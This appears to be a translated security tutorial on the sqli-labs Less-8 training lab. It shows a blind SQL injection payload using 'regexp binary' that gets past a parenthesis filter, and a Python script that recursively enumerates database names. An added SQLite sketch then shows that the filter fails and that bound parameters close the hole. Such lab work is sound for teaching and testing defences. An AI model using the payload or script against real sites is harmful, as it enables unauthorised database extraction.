0x00 Environment Construction
Use sqli-labs Less-8 and make one small change to its source code: add the following line, which strips parentheses from the id parameter.
$id = preg_replace('/\(|\)/', "", $id); // filter parentheses
0x01 Script Writing
1. Construct the payload
' union select 1,2,3 from information_schema.tables where table_schema regexp binary '^%s.*$' -- -
2. The script is as follows
# coding=utf-8
import urllib.parse
import urllib.request

url = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s"
# Test payload. The Less-8 query returns three columns, so the union select list is 1,2,3.
payload = "' and 1=2 union select 1,2,3 from information_schema.tables where table_schema regexp binary '^%s.*$' -- -"
# Simple test dictionary; string.printable could be used here instead
chlist = 'abcdefghijklmnopqrstuvwxyz'

# Recursively enumerate database names
def check(prefix):
    for ch in chlist:
        payloads = payload % (prefix + ch)
        if check1(payloads):
            print(prefix + ch)
            check(prefix + ch)

# Decide whether the regular expression matched
def check1(str1):
    resp = urllib.request.urlopen(url % urllib.parse.quote(str1)).read().decode("utf-8", "replace")
    return "You are in" in resp

if __name__ == "__main__":
    check("")
Partial results of script execution
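Added example (not part of the original post): an in-memory SQLite stand-in for the lab, showing that the parenthesis blacklist breaks function-call probes but leaves an operator-only probe working as a boolean oracle, while a bound parameter removes the oracle entirely. SQLite, `glob` in place of MySQL's `regexp binary`, `sqlite_master` in place of `information_schema.tables`, the sample row and all function names are assumptions of this sketch.

```python
import re
import sqlite3

# Constructed probes: same shape as the payload above, adapted to SQLite.
BASE = "1' and 1=2 union select 1,2,3 from sqlite_master where %s -- -"
GLOB_HIT, GLOB_MISS = BASE % "name glob 'u*'", BASE % "name glob 'x*'"
FUNC_HIT, FUNC_MISS = (BASE % "substr(name,1,1)='u'",
                       BASE % "substr(name,1,1)='x'")

def make_db():
    # Constructed stand-in for the lab's three-column users table.
    db = sqlite3.connect(":memory:")
    db.execute("create table users (id integer, username text, password text)")
    db.execute("insert into users values (1, 'Dumb', 'Dumb')")
    return db

def strip_parens(value):
    # Python equivalent of the PHP blacklist: drop every '(' and ')'.
    return re.sub(r"\(|\)", "", value)

def lookup_filtered(db, user_id):
    # Lab-style handler: blacklist, then string concatenation into the query.
    sql = "select * from users where id='%s' limit 1" % strip_parens(user_id)
    try:
        return db.execute(sql).fetchone() is not None  # True = "You are in"
    except sqlite3.Error:
        return False  # Less-8 prints nothing when the query fails

def lookup_bound(db, user_id):
    # Hardened handler: the value is bound as data and never parsed as SQL.
    sql = "select * from users where id=? limit 1"
    return db.execute(sql, (user_id,)).fetchone() is not None

def oracle_leaks(lookup, hit, miss):
    # A boolean oracle exists when the page answers the two probes differently.
    db = make_db()
    return lookup(db, hit) != lookup(db, miss)

if __name__ == "__main__":
    print("filtered, function probe:", oracle_leaks(lookup_filtered, FUNC_HIT, FUNC_MISS))
    print("filtered, operator probe:", oracle_leaks(lookup_filtered, GLOB_HIT, GLOB_MISS))
    print("bound,    operator probe:", oracle_leaks(lookup_bound, GLOB_HIT, GLOB_MISS))
```

The fix that carries over to the lab's PHP is the same: bind `$id` through a prepared statement instead of filtering characters out of it.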